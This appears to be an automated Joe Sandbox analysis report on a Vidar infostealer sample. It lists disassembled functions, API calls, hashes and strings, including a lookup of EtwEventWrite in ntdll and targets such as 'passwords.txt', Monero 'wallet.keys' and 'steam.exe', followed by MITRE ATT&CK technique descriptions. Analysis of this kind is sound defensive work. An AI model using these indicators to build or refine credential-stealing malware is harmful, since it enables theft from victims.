Instruction Fuzzy Hash: A5D012353C030477E1781B54BC5FF1A3934D7C9F02F201164F311680E046E41402973E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

EtwEventWrite, xrefs: 004018C5
ntdll.dll, xrefs: 004018B5

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: 5e51bf90e60cb14d8bd058217a4af9c92f753a1577894b23d64cda725500b0c0
Instruction ID: b010eca93dcea5ac8893ac9cbd630a9a56b58122e1a4efb0db09dbf7787f5420
Opcode Fuzzy Hash: 5e51bf90e60cb14d8bd058217a4af9c92f753a1577894b23d64cda725500b0c0
Instruction Fuzzy Hash: F9B09260B803019BDE186B716F9DB8636786B64B067987262A18AD01B0D7BC8024961E

Function 00425261 Relevance: 6.1, APIs: 4, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00425294
_siglookup.LIBCMT ref: 004252BB
DecodePointer.KERNEL32(00000000), ref: 00425313
__lock.LIBCMT ref: 0042533A

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: DecodePointer__getptd_noexit__lock_siglookup
String ID:
API String ID: 2847133137-0
Opcode ID: 566fb7a9ce621392c45170995ac80ea6371b7fc17e128289bbc3db9a78952912
Instruction ID: 163363832fae9a4e463df0ece09c03a68562d95583d470f652ab41388aeef822
Opcode Fuzzy Hash: 566fb7a9ce621392c45170995ac80ea6371b7fc17e128289bbc3db9a78952912
Instruction Fuzzy Hash: 01416D70F00B25CBCB24DF69E8845AEB7B0AB45355BA4512BE801A7391C7B89841CB6C

Function 0041BE93 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041BED8
_memmove.LIBCMT ref: 0041BEEC
_memmove.LIBCMT ref: 0041BF39
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0041AF7E,?,00000001,?,?,?), ref: 0041BF58

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: 081153dacd6338b17544171e625a01bba3250c1498290e89897b4e19aa5d6555
Instruction ID: ab02847f2cf5829e892bba1cb09279ef8e0d79e99e6af2a88f0bb91435c9bab5
Opcode Fuzzy Hash: 081153dacd6338b17544171e625a01bba3250c1498290e89897b4e19aa5d6555
Instruction Fuzzy Hash: F7316A72600704AFD721CF55D980AA7B7F8FB48700F40892EE986C7A40DB74F9458F98

Function 0040A916 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 211COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB

Strings

passwords.txt, xrefs: 0040AB89
pe, xrefs: 0040A931

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: passwords.txt$pe
API String ID: 3555123492-1761351166
Opcode ID: 724b19f77cfbadd78dc1faf4d27645deae132dfd84264f190695712cfec16b52
Instruction ID: f290e10536fc29165bd90020ec0e89fb1ec55b4f39b8cd3f3e59d108c05ab857
Opcode Fuzzy Hash: 724b19f77cfbadd78dc1faf4d27645deae132dfd84264f190695712cfec16b52
Instruction Fuzzy Hash: 4A71A331500215ABCF15EFA1ED4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6

Function 00401AB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

\Monero\wallet.keys, xrefs: 00401B2F
.keys, xrefs: 00401B0D

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3287460435-3586502688
Opcode ID: cf161e074d62e690d0b94438d2b7b7274b7aef0c457231e342b3ec309f2517bf
Instruction ID: 2364c372bad150323d67af03c4d359b51cc93a95bd900eacfe79e48eddbf336c
Opcode Fuzzy Hash: cf161e074d62e690d0b94438d2b7b7274b7aef0c457231e342b3ec309f2517bf
Instruction Fuzzy Hash: 13515EB1E5011D9BCF11EB25DD466DD7379AF04308F1050BAB60873191DA78AFC98F48

Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00412CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31

Strings

.exe, xrefs: 00412C3C

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateProcess_memset
String ID: .exe
API String ID: 1177741608-4119554291
Opcode ID: 6e479dc581881d65200dc593a30c3e623ce6e850db41571400e5ac604b80adaf
Instruction ID: 607805de85d34077ac8010c86c96324dc0739edf941e59843d4d701679f3259e
Opcode Fuzzy Hash: 6e479dc581881d65200dc593a30c3e623ce6e850db41571400e5ac604b80adaf
Instruction Fuzzy Hash: A3417372E00109BBDF11FBA6ED42ACE7775AF44308F510076F500B7191DAB86E8A8BD9

Function 00413259 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413278
strtok_s.MSVCRT ref: 00413371

Strings

xA, xrefs: 0041326B, 0041326E

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: xA
API String ID: 3330995566-34346596
Opcode ID: b01048b4caaf2d781f6d9571aa0d0e9d3a4acf772d059dc07aa8dac5df416a25
Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
Opcode Fuzzy Hash: b01048b4caaf2d781f6d9571aa0d0e9d3a4acf772d059dc07aa8dac5df416a25
Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C

Function 004134D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004134F7
strtok_s.MSVCRT ref: 00413589

Strings

yA, xrefs: 004134E9, 004134EC

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: yA
API String ID: 3330995566-454502181
Opcode ID: 0a5a2c7c2122c5fde08efb15dbd5b8a7581154b05120f6610f4b5857c0dd4555
Instruction ID: e25e2a4fac4fdaa3031c2764c7a521eb05de7460a47cf09186ea45e794858a97
Opcode Fuzzy Hash: 0a5a2c7c2122c5fde08efb15dbd5b8a7581154b05120f6610f4b5857c0dd4555
Instruction Fuzzy Hash: D6219571D00109BFCB18DF64C881ADABBADFF18705F11905BE809EB251E774DB858B98

Function 00413390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004133AF
strtok_s.MSVCRT ref: 00413424

Strings

2yA, xrefs: 004133A1, 004133A4

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: 2yA
API String ID: 3330995566-663247701
Opcode ID: ab0f24262003b4c6fdb1df3be14b33564e9d911830fd1b95aa49f2419afa3619
Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
Opcode Fuzzy Hash: ab0f24262003b4c6fdb1df3be14b33564e9d911830fd1b95aa49f2419afa3619
Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 5bd3c72e2a2c28d7f98c1eadb8a5e2855416913c1cc93355d95e2efce2546025
Instruction ID: b8e333327a8be3efb5a61452340683a7f3e77127bc94f8cc85e467c2da99d15f
Opcode Fuzzy Hash: 5bd3c72e2a2c28d7f98c1eadb8a5e2855416913c1cc93355d95e2efce2546025
Instruction Fuzzy Hash: B611A375300201ABDB24DF2DD941929B369FF85354714413FF801ABBC2C779ED69C69A

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 11bcbbf4e3385ff2571c5c45c4b2439a3f96e274cabb5125d6892df765bbcaf0
Instruction ID: 943bf7d0d5a8fabe028b1a780fc3b1132d50164a8b8b874ee1f3eb6896142e72
Opcode Fuzzy Hash: 11bcbbf4e3385ff2571c5c45c4b2439a3f96e274cabb5125d6892df765bbcaf0
Instruction Fuzzy Hash: 0611E131304210EBDB24DE6CD9809697365AF45324744067BF815EFAC2C33CED458B9A

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,74DF0440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 8d6f190ab6b2ba40715b33eca56b8a5e9ffc43c45ee1a123cf25a47b4358ef61
Instruction ID: af76378122cbc654785c4284bc1f2564db1dd501434687a4ca840133f71d0007
Opcode Fuzzy Hash: 8d6f190ab6b2ba40715b33eca56b8a5e9ffc43c45ee1a123cf25a47b4358ef61
Instruction Fuzzy Hash: 4601AD713107418BD7348E7899C491FB2A2EB85B20730493ED982D7B85DB7CE84E8798

Function 004282E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 004282FE
__invoke_watson.LIBCMT ref: 00428352

Part of subcall function 0042818D: _strcat_s.LIBCMT ref: 004281AC

Strings

,NC, xrefs: 0042833D

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 6e4e6a371cba90ef9ebeeb0ca97326c2cbf7688855193e91cf68080b76189653
Instruction ID: 9fd3745167120440bfdedbbf8520646eac0ac106fd9ee082a2a4634a1cd760c1
Opcode Fuzzy Hash: 6e4e6a371cba90ef9ebeeb0ca97326c2cbf7688855193e91cf68080b76189653
Instruction Fuzzy Hash: 9EF0F4725412187FDB116EA09C43EEF3B5AAF00354F88805AFD1886191DA379D60C754

Function 004124A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CloseH_prolog3_catch_Handle
String ID: steam.exe
API String ID: 860495366-2826358650
Opcode ID: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
Instruction ID: a3cdee16b5dfd04d3bd918c7eedd9f2c5ccf5c1b7225a83da59ac7103b0bc528
Opcode Fuzzy Hash: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
Instruction Fuzzy Hash: 81012170A01224DFDB60DB64DD45BDE77B9AF09311F4011E6E409E2290EB398B81CB25

Function 0042818D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcat_s.LIBCMT ref: 004281AC
__invoke_watson.LIBCMT ref: 004281C8

Strings

`8C, xrefs: 0042819E, 004281A4

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_s
String ID: `8C
API String ID: 228796091-1339866851
Opcode ID: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction ID: d641333d3b05eb37c220185af6f0ca3676d28bda76794771061db1e67d1cdd83
Opcode Fuzzy Hash: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction Fuzzy Hash: D9E09273601219ABDB111E56EC419EF7719FFC0368B45043AFD1852001DB3699A29694

Function 0041F4D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F50E
DName::DName.LIBCMT ref: 0041F51A

Strings

{flat}, xrefs: 0041F509

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction ID: 71cdc5086ad98bd25e234238e95b4002ba9000919263a4584fe9e931f4e7c874
Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction Fuzzy Hash: 84F0A031144208AFCB10EF58D415BE53BA1AF4575AF08805AF94C4F393D774E8C2C799

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: 7d61576bc23e6c09f31e39ad3bd34650203f811b8cd45cb545fdcfe0ae16857c
Instruction ID: 7279cf6f1f22d2a2ba8e3215006abc5fc6e9ec8f7915935b92b5a6e75ca34a4d
Opcode Fuzzy Hash: 7d61576bc23e6c09f31e39ad3bd34650203f811b8cd45cb545fdcfe0ae16857c
Instruction Fuzzy Hash: 8EE0E0F1D1020C9BDB14DFA5E946F5DB7F89B04704F5000299A05E7181E678BB098B59

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lCVFGKfczi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_7d9f448d78fec3b9946c73ac6e84ff27254967c_027e51c2_10b3ea86-3d74-4b1d-ad98-bdc13251b496\Report.wer

